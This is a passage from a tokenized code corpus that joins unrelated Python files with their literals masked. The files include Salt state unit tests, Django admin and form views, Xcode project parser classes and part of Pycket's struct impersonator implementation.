{ '<STR_LIT:test>' : True } ) : <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : None } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> with patch . dict ( selinux . __opts__ , { '<STR_LIT:test>' : False } ) : <EOL> comt = ( '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> comt = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ret . update ( { '<STR_LIT>' : comt , '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( selinux . boolean ( name , value ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( SelinuxTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . states import win_system <EOL> win_system . __salt__ = { } <EOL> win_system . __opts__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class WinSystemTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_desc ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_desc ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT:result>' : False , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_desc ( '<STR_LIT>' ) , ret ) <EOL> def test_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> mock = MagicMock ( side_effect = [ None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : True } ) : <EOL> ret . update ( { '<STR_LIT:result>' : None , '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , ret ) <EOL> with patch . dict ( win_system . __opts__ , { "<STR_LIT:test>" : False } ) : <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( win_system . __salt__ , <EOL> { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" , '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( win_system . computer_name ( '<STR_LIT>' ) , <EOL> ret ) <EOL> def test_hostname ( self ) : <EOL> ret = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = False ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : False } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { "<STR_LIT>" : mock } ) : <EOL> ret . update ( { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT:result>' : True } ) <EOL> self . assertDictEqual ( win_system . hostname ( '<STR_LIT>' ) , ret ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( WinSystemTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . mock import MagicMock , patch , NO_MOCK , NO_MOCK_REASON <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . utils . gitfs <EOL> from salt . exceptions import FileserverConfigError <EOL> OPTS = { '<STR_LIT>' : '<STR_LIT>' } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class TestGitFSProvider ( TestCase ) : <EOL> def test_provider_case_insensitive ( self ) : <EOL> '''<STR_LIT>''' <EOL> provider = '<STR_LIT>' <EOL> for role_name , role_class in ( <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitFS ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitPillar ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . WinRepo ) ) : <EOL> key = '<STR_LIT>' . format ( role_name ) <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = True ) ) : <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = False ) ) : <EOL> with patch . object ( role_class , '<STR_LIT>' , <EOL> MagicMock ( return_value = False ) ) : <EOL> args = [ OPTS ] <EOL> if role_name == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> with patch . dict ( OPTS , { key : provider } ) : <EOL> role_class ( * args ) <EOL> role_class ( * args ) <EOL> def test_valid_provider ( self ) : <EOL> '''<STR_LIT>''' <EOL> def _get_mock ( verify , provider ) : <EOL> '''<STR_LIT>''' <EOL> return MagicMock ( return_value = verify . endswith ( provider ) ) <EOL> for role_name , role_class in ( <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitFS ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . GitPillar ) , <EOL> ( '<STR_LIT>' , salt . utils . gitfs . WinRepo ) ) : <EOL> key = '<STR_LIT>' . format ( role_name ) <EOL> for provider in salt . utils . gitfs . VALID_PROVIDERS : <EOL> verify = '<STR_LIT>' <EOL> mock1 = _get_mock ( verify , provider ) <EOL> with patch . object ( role_class , verify , mock1 ) : <EOL> verify = '<STR_LIT>' <EOL> mock2 = _get_mock ( verify , provider ) <EOL> with patch . object ( role_class , verify , mock2 ) : <EOL> verify = '<STR_LIT>' <EOL> mock3 = _get_mock ( verify , provider ) <EOL> with patch . object ( role_class , verify , mock3 ) : <EOL> args = [ OPTS ] <EOL> if role_name == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> with patch . dict ( OPTS , { key : provider } ) : <EOL> if role_name == '<STR_LIT>' or ( role_name != '<STR_LIT>' <EOL> and provider != '<STR_LIT>' ) : <EOL> role_class ( * args ) <EOL> else : <EOL> self . assertRaises ( <EOL> FileserverConfigError , <EOL> role_class , <EOL> * args <EOL> ) <EOL> with patch . dict ( OPTS , { key : '<STR_LIT:foo>' } ) : <EOL> self . assertRaises ( <EOL> FileserverConfigError , <EOL> role_class , <EOL> * args <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( TestGitFSProvider , needs_daemon = False ) </s>
<s> from django . contrib import admin <EOL> from cms_redirects . models import CMSRedirect <EOL> class CMSRedirectAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> search_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> radio_fields = { '<STR_LIT>' : admin . VERTICAL } <EOL> fieldsets = [ <EOL> ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ] <EOL> admin . site . register ( CMSRedirect , CMSRedirectAdmin ) </s>
<s> from django . dispatch import receiver <EOL> from image_diet . diet import squeeze <EOL> try : <EOL> from easy_thumbnails . signals import saved_file , thumbnail_created <EOL> @ receiver ( saved_file ) <EOL> def optimize_file ( sender , fieldfile , ** kwargs ) : <EOL> squeeze ( fieldfile . path ) <EOL> @ receiver ( thumbnail_created ) <EOL> def optimize_thumbnail ( sender , ** kwargs ) : <EOL> squeeze ( sender . path ) <EOL> except ImportError : <EOL> pass </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import sys <EOL> from . xcspec import * <EOL> class XCSpecBuildPhase ( xcspec ) : <EOL> def __init__ ( self , spec_data ) : <EOL> super ( XCSpecBuildPhase , self ) . __init__ ( spec_data ) ; </s>
<s> from . PBXResolver import * <EOL> from . PBX_Base import * <EOL> class PBXBuildRule ( PBX_Base ) : <EOL> def __init__ ( self , lookup_func , dictionary , project , identifier ) : <EOL> super ( PBXBuildRule , self ) . __init__ ( lookup_func , dictionary , project , identifier ) ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . compilerSpec = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . filePatterns = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . fileType = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . isEditable = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . outputFiles = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . script = dictionary [ '<STR_LIT>' ] ; </s>
<s> import os <EOL> from . PBX_Base_Reference import * <EOL> from ... Helpers import path_helper <EOL> class PBXZipArchiveReference ( PBX_Base_Reference ) : <EOL> def __init__ ( self , lookup_func , dictionary , project , identifier ) : <EOL> super ( PBXZipArchiveReference , self ) . __init__ ( lookup_func , dictionary , project , identifier ) ; </s>
<s> from Base_Action import Base_Action </s>
<s> import os . path <EOL> import unittest <EOL> def get_tests ( ) : <EOL> return full_suite ( ) <EOL> def full_suite ( ) : <EOL> from . resource import ResourceTestCase <EOL> from . serializer import ResourceTestCase as SerializerTestCase <EOL> from . utils import UtilsTestCase <EOL> resourcesuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( ResourceTestCase ) <EOL> serializersuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( SerializerTestCase ) <EOL> utilssuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( UtilsTestCase ) <EOL> return unittest . TestSuite ( [ resourcesuite , serializersuite , utilssuite ] ) </s>
<s> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext as _ <EOL> from django . http import HttpResponseRedirect <EOL> from django . conf import settings <EOL> from form_designer import settings as app_settings <EOL> from django . contrib import messages <EOL> from django . core . context_processors import csrf <EOL> import os <EOL> import random <EOL> from datetime import datetime <EOL> from form_designer . forms import DesignedForm <EOL> from form_designer . models import FormDefinition , FormLog <EOL> from form_designer . uploads import handle_uploaded_files <EOL> from form_designer . signals import ( designedform_submit , designedform_success , <EOL> designedform_error , designedform_render ) <EOL> def process_form ( request , form_definition , extra_context = { } , disable_redirection = False ) : <EOL> context = extra_context <EOL> success_message = form_definition . success_message or _ ( '<STR_LIT>' ) <EOL> error_message = form_definition . error_message or _ ( '<STR_LIT>' ) <EOL> form_error = False <EOL> form_success = False <EOL> is_submit = False <EOL> if request . method == '<STR_LIT:POST>' and request . POST . get ( form_definition . submit_flag_name ) : <EOL> form = DesignedForm ( form_definition , None , request . POST , request . FILES ) <EOL> is_submit = True <EOL> if request . method == '<STR_LIT:GET>' and request . GET . get ( form_definition . submit_flag_name ) : <EOL> form = DesignedForm ( form_definition , None , request . GET ) <EOL> is_submit = True <EOL> if is_submit : <EOL> designedform_submit . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> if form . is_valid ( ) : <EOL> files = handle_uploaded_files ( form_definition , form ) <EOL> messages . success ( request , success_message ) <EOL> form_success = True <EOL> designedform_success . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> if form_definition . log_data : <EOL> form_definition . log ( form , request . user ) <EOL> if form_definition . mail_to : <EOL> form_definition . send_mail ( form , files ) <EOL> if form_definition . success_redirect and not disable_redirection : <EOL> return HttpResponseRedirect ( form_definition . action or '<STR_LIT:?>' ) <EOL> if form_definition . success_clear : <EOL> form = DesignedForm ( form_definition ) <EOL> else : <EOL> form_error = True <EOL> designedform_error . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> messages . error ( request , error_message ) <EOL> else : <EOL> if form_definition . allow_get_initial : <EOL> form = DesignedForm ( form_definition , initial_data = request . GET ) <EOL> else : <EOL> form = DesignedForm ( form_definition ) <EOL> designedform_render . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> context . update ( { <EOL> '<STR_LIT>' : form_error , <EOL> '<STR_LIT>' : form_success , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : form_definition <EOL> } ) <EOL> context . update ( csrf ( request ) ) <EOL> if form_definition . display_logged : <EOL> logs = form_definition . logs . all ( ) . order_by ( '<STR_LIT>' ) <EOL> context . update ( { '<STR_LIT>' : logs } ) <EOL> return context <EOL> def _form_detail_view ( request , form_definition ) : <EOL> result = process_form ( request , form_definition ) <EOL> if isinstance ( result , HttpResponseRedirect ) : <EOL> return result <EOL> result . update ( { <EOL> '<STR_LIT>' : form_definition . form_template_name or app_settings . DEFAULT_FORM_TEMPLATE <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , result , <EOL> context_instance = RequestContext ( request ) ) <EOL> def detail ( request , object_name ) : <EOL> form_definition = get_object_or_404 ( FormDefinition , name = object_name , require_hash = False ) <EOL> return _form_detail_view ( request , form_definition ) <EOL> def detail_by_hash ( request , public_hash ) : <EOL> form_definition = get_object_or_404 ( FormDefinition , public_hash = public_hash ) <EOL> return _form_detail_view ( request , form_definition ) </s>
<s> from pycket import values , values_struct <EOL> from pycket . base import SingletonMeta , W_Object <EOL> from pycket . cont import call_cont , continuation , guarded_loop , label <EOL> from pycket . impersonators import ( <EOL> ChaperoneMixin , <EOL> ImpersonatorMixin , <EOL> ProxyMixin , <EOL> W_ImpPropertyDescriptor , <EOL> chaperone_reference_cont , <EOL> check_chaperone_results , <EOL> get_base_object , <EOL> make_property_map , <EOL> impersonate_reference_cont <EOL> ) <EOL> from pycket . hidden_classes import make_caching_map_type , make_map_type , make_composite_map_type <EOL> from pycket . small_list import inline_small_list <EOL> from rpython . rlib import jit , unroll <EOL> from rpython . rlib . objectmodel import import_from_mixin , specialize , always_inline <EOL> def is_static_handler ( func ) : <EOL> return isinstance ( func , values . W_Prim ) or isinstance ( func , values . W_PromotableClosure ) <EOL> def enter_above_depth ( n ) : <EOL> @ jit . unroll_safe <EOL> def above_threshold ( self , field , * args ) : <EOL> if jit . we_are_jitted ( ) : <EOL> return True <EOL> for _ in range ( n ) : <EOL> if not isinstance ( self , W_InterposeStructBase ) : <EOL> return False <EOL> self = self . inner <EOL> return True <EOL> return above_threshold <EOL> HANDLER_ACCESSOR_TAG = <NUM_LIT> <EOL> HANDLER_MUTATOR_TAG = <NUM_LIT> <EOL> OVERRIDE_ACCESSOR_TAG = <NUM_LIT> <EOL> OVERRIDE_MUTATOR_TAG = <NUM_LIT> <EOL> TAG_BITS = <NUM_LIT:2> <EOL> def tag_handler_accessor ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | HANDLER_ACCESSOR_TAG <EOL> def tag_handler_mutator ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | HANDLER_MUTATOR_TAG <EOL> def tag_override_accessor ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | OVERRIDE_ACCESSOR_TAG <EOL> def tag_override_mutator ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | OVERRIDE_MUTATOR_TAG <EOL> def is_accessor ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:0> <EOL> def is_mutator ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:1> <EOL> def is_handler ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:0> <EOL> def is_override ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:1> <EOL> def add_handler_field ( map , handler_array , name , val ) : <EOL> if is_static_handler ( val ) : <EOL> new_map = map . add_static_attribute ( name , val ) <EOL> else : <EOL> if handler_array is None : <EOL> handler_array = [ ] <EOL> new_map = map . add_dynamic_attribute ( name ) <EOL> handler_array . append ( val ) <EOL> return handler_array , new_map <EOL> class Pair ( W_Object ) : <EOL> _attrs_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , fst , snd ) : <EOL> self . fst = fst <EOL> self . snd = snd <EOL> def __iter__ ( self ) : <EOL> yield self . fst <EOL> yield self . snd <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __getitem__ ( self , idx ) : <EOL> if idx == <NUM_LIT:0> : <EOL> return self . fst <EOL> if idx == <NUM_LIT:1> : <EOL> return self . snd <EOL> raise IndexError ( "<STR_LIT>" % idx ) <EOL> NONE_PAIR = Pair ( None , None ) <EOL> CompositeMap = make_composite_map_type ( shared_storage = True ) <EOL> @ jit . unroll_safe <EOL> def impersonator_args ( struct , overrides , handlers , prop_keys , prop_vals ) : <EOL> from pycket . prims . struct_structinfo import struct_info <EOL> assert len ( overrides ) == len ( handlers ) <EOL> _handlers = None <EOL> struct_props = None <EOL> struct_prop_keys = None <EOL> struct_prop_vals = None <EOL> handler_map = W_InterposeStructBase . EMPTY_HANDLER_MAP <EOL> struct_type = jit . promote ( struct . struct_type ( ) ) <EOL> for i , op in enumerate ( overrides ) : <EOL> base = get_base_object ( op ) <EOL> if isinstance ( base , values_struct . W_StructFieldAccessor ) : <EOL> if handlers [ i ] is not values . w_false : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_handler_accessor ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> if type ( op ) is not values_struct . W_StructFieldAccessor : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_override_accessor ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , op ) <EOL> elif isinstance ( base , values_struct . W_StructFieldMutator ) : <EOL> if handlers [ i ] is not values . w_false : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_handler_mutator ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> if type ( op ) is not values_struct . W_StructFieldAccessor : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_override_mutator ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , op ) <EOL> elif base is struct_info and handlers [ i ] is not values . w_false : <EOL> idx = INFO_HANDLER_IDX <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> elif isinstance ( base , values_struct . W_StructPropertyAccessor ) : <EOL> if struct_prop_keys is None : <EOL> struct_prop_keys = [ ] <EOL> struct_prop_vals = [ ] <EOL> struct_prop_keys . append ( base ) <EOL> struct_prop_vals . append ( Pair ( op , handlers [ i ] ) ) <EOL> else : <EOL> assert False <EOL> EMPTY = W_InterposeStructBase . EMPTY_PROPERTY_MAP <EOL> property_map = make_property_map ( struct_prop_keys , make_property_map ( prop_keys , EMPTY ) ) <EOL> vals = concat ( _handlers , concat ( prop_vals , struct_prop_vals ) ) <EOL> storage = vals [ : ] if vals is not None else None <EOL> map = CompositeMap . instantiate ( handler_map , property_map ) <EOL> return map , storage <EOL> def concat ( l1 , l2 ) : <EOL> """<STR_LIT>""" <EOL> if l1 is None : <EOL> return l2 <EOL> if l2 is None : <EOL> return l1 <EOL> return l1 + l2 <EOL> @ jit . elidable <EOL> def has_accessor ( map ) : <EOL> for tag in map . iterkeys ( ) : <EOL> if is_handler ( tag ) and is_accessor ( tag ) : <EOL> return True <EOL> return False <EOL> @ jit . elidable <EOL> def has_property_descriptor ( map ) : <EOL> for key in map . iterkeys ( ) : <EOL> if type ( key ) is W_ImpPropertyDescriptor : <EOL> return True <EOL> return False <EOL> @ specialize . arg ( <NUM_LIT:0> ) <EOL> def make_struct_proxy ( cls , inner , overrides , handlers , prop_keys , prop_vals ) : <EOL> assert isinstance ( inner , values_struct . W_RootStruct ) <EOL> assert not prop_keys and not prop_vals or len ( prop_keys ) == len ( prop_vals ) <EOL> map , _handlers = impersonator_args ( inner , overrides , handlers , prop_keys , prop_vals ) <EOL> return cls . make ( _handlers , inner , map ) <EOL> INFO_HANDLER_IDX = - <NUM_LIT:1> <EOL> INFO_OVERRIDE_IDX = - <NUM_LIT:2> <EOL> class W_InterposeStructBase ( values_struct . W_RootStruct ) : <EOL> EMPTY_HANDLER_MAP = make_caching_map_type ( "<STR_LIT>" ) . EMPTY <EOL> EMPTY_PROPERTY_MAP = make_map_type ( "<STR_LIT>" ) . EMPTY <EOL> _attrs_ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inner , map ) : <EOL> self . inner = inner <EOL> self . map = map <EOL> if isinstance ( inner , W_InterposeStructBase ) and map is inner . map : <EOL> self . base = inner . base <EOL> else : <EOL> self . base = inner <EOL> def get_storage_index ( self , idx ) : <EOL> return self . _get_list ( idx ) <EOL> def get_proxied ( self ) : <EOL> return self . inner <EOL> def get_base ( self ) : <EOL> return self . base <EOL> def is_proxy ( self ) : <EOL> return True <EOL> def get_property ( self , prop , default = None ) : <EOL> return self . map . lookup_property ( prop , self , default = default ) <EOL> def immutable ( self ) : <EOL> return get_base_object ( self . base ) . immutable ( ) <EOL> def tostring ( self ) : <EOL> return get_base_object ( self . base ) . tostring ( ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def is_non_interposing_chaperone ( self ) : <EOL> map = jit . promote ( self . map ) <EOL> return ( not has_accessor ( map . handlers ) and <EOL> has_property_descriptor ( map . properties ) ) <EOL> def struct_type ( self ) : <EOL> return get_base_object ( self . base ) . struct_type ( ) <EOL> def get_handler_accessor ( self , field ) : <EOL> idx = tag_handler_accessor ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> def get_override_accessor ( self , field ) : <EOL> idx = tag_override_accessor ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> def get_handler_mutator ( self , field ) : <EOL> idx = tag_handler_mutator ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> def get_override_mutator ( self , field ) : <EOL> idx = tag_override_mutator ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def ref_with_extra_info ( self , field , app , env , cont ) : <EOL> handler = self . get_handler_accessor ( field ) <EOL> override = self . get_override_accessor ( field ) <EOL> if handler is None and override is None : <EOL> return self . base . ref_with_extra_info ( field , app , env , cont ) <EOL> if handler is not None : <EOL> cont = self . post_ref_cont ( handler , app , env , cont ) <EOL> if override is not None : <EOL> return override . call_with_extra_info ( [ self . inner ] , env , cont , app ) <EOL> return self . inner . ref_with_extra_info ( field , app , env , cont ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def set_with_extra_info ( self , field , val , app , env , cont ) : <EOL> handler = self . get_handler_mutator ( field ) <EOL> override = self . get_override_mutator ( field ) <EOL> if handler is None and override is None : <EOL> return self . base . set_with_extra_info ( field , val , app , env , cont ) <EOL> if handler is None : <EOL> return self . inner . set_with_extra_info ( field , val , app , env , cont ) <EOL> after = self . post_set_cont ( override , field , val , app , env , cont ) <EOL> return handler . call_with_extra_info ( [ self , val ] , env , after , app ) <EOL> def get_prop ( self , property , env , cont ) : <EOL> pair = self . get_property ( property , default = NONE_PAIR ) <EOL> assert type ( pair ) is Pair <EOL> op , interp = pair <EOL> if op is None or interp is None : <EOL> return self . inner . get_prop ( property , env , cont ) <EOL> after = self . post_ref_cont ( interp , None , env , cont ) <EOL> return op . call ( [ self . inner ] , env , after ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def get_struct_info ( self , env , cont ) : <EOL> handler = self . map . lookup_handler ( INFO_HANDLER_IDX , self ) <EOL> if handler is not None : <EOL> cont = call_cont ( handler , env , cont ) <EOL> return self . inner . get_struct_info ( env , cont ) <EOL> def get_arity ( self ) : <EOL> return get_base_object ( self . base ) . get_arity ( ) <EOL> def vals ( self ) : <EOL> base = get_base_object ( self . base ) <EOL> assert isinstance ( base , values_struct . W_RootStruct ) <EOL> return base . vals ( ) <EOL> @ inline_small_list ( immutable = True , unbox_num = True ) <EOL> class W_ImpStruct ( W_InterposeStructBase ) : <EOL> import_from_mixin ( ImpersonatorMixin ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> return impersonate_reference_cont ( interp , [ self ] , app , env , cont ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> return imp_struct_set_cont ( self . inner , op , field , app , env , cont ) <EOL> @ inline_small_list ( immutable = True , unbox_num = True ) <EOL> class W_ChpStruct ( W_InterposeStructBase ) : <EOL> import_from_mixin ( ChaperoneMixin ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> args = values . Values . make1 ( self ) <EOL> return chaperone_reference_cont ( interp , args , app , env , cont ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> val = values . Values . make1 ( val ) <EOL> return check_chaperone_results ( val , env , <EOL> imp_struct_set_cont ( self . inner , op , field , app , env , cont ) ) <EOL> class W_InterposeStructStack ( values_struct . W_RootStruct ) : <EOL> import_from_mixin ( ProxyMixin ) <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inner , handlers , handler_map ) : <EOL> self . handlers = handlers <EOL> self . handler_map = handler_map 